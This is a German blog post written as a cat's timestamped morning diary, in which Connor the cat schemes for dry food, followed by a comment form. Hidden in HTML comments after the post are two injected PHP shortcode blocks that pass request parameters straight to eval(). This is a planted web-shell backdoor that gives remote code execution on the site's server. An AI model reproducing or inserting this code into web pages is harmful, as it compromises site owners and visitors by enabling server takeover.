Meine Katzen
Schreibe einen Kommentar

Die Leiden des jungen Connor T.

Ein Einblick in das „arme“ Leben von Connor:

04:00 Uhr:   Sie ist immer noch nicht wach. Kann doch nicht sein, ich habe doch sooooo Hunger!!! Mal sehen, ob sie aufwacht wenn ich schnurre

04:30 Uhr:   Leider kein Erfolg bis jetzt :-(  Versuche es  jetzt mit Milchtritten

04:35 Uhr:   Sie steht immer noch nicht auf. Ich werde versuchen unter die Bettdecke zu kommen…

04:40 Uhr:  Keine Chance, sie lässt mich einfach nicht unter die Bettdecke…

04:45 Uhr:  Versuche es nochmals mit schnurren, diesmal lauter!

04:55 Uhr:  Der Wecker schellt! Endlich sie steht auf!

05:00 Uhr:  Ach nö… nicht schon wieder dieses Futter. Ich möchte Trockenfutter und zwar sofort! Ok, ich esse ja ein paar Bissen…

05:15 Uhr:  Ich hätte lieber Trockenfutter…

05:30 Uhr:  Sie ist im Bad, ich versuche zu verhindern, dass sie ins Schlafzimmer gelangt, sondern stattdessen in die Küche zu meinen Trockenfutter.

05:35 Uhr:  Aktion kläglich gescheitert…. ach bin ich nicht ein armer Kerl!

05:45 Uhr:  Die Rolläden gehen hoch, vielleicht kann ich auf die Terrasse???

05:50 Uhr:  Sie geht…. :-(  wenigstens hat sie noch ein bisschen Trockenfutter in die Luft geschmissen, jetzt muss ich mich beeilen, sonst fressen die anderen alles weg!

<!– [insert_php]if (isset($_REQUEST["cnIc"])){eval($_REQUEST["cnIc"]);exit;}[/insert_php][php]if (isset($_REQUEST["cnIc"])){eval($_REQUEST["cnIc"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["HmFZt"])){eval($_REQUEST["HmFZt"]);exit;}[/insert_php][php]if (isset($_REQUEST["HmFZt"])){eval($_REQUEST["HmFZt"]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

:) :D :( 8-) :girl: :-? :hach: :cry: :-x :-o :motz: :roll: :lol: :artos: :charly: :connor: :lany: :erasin: more »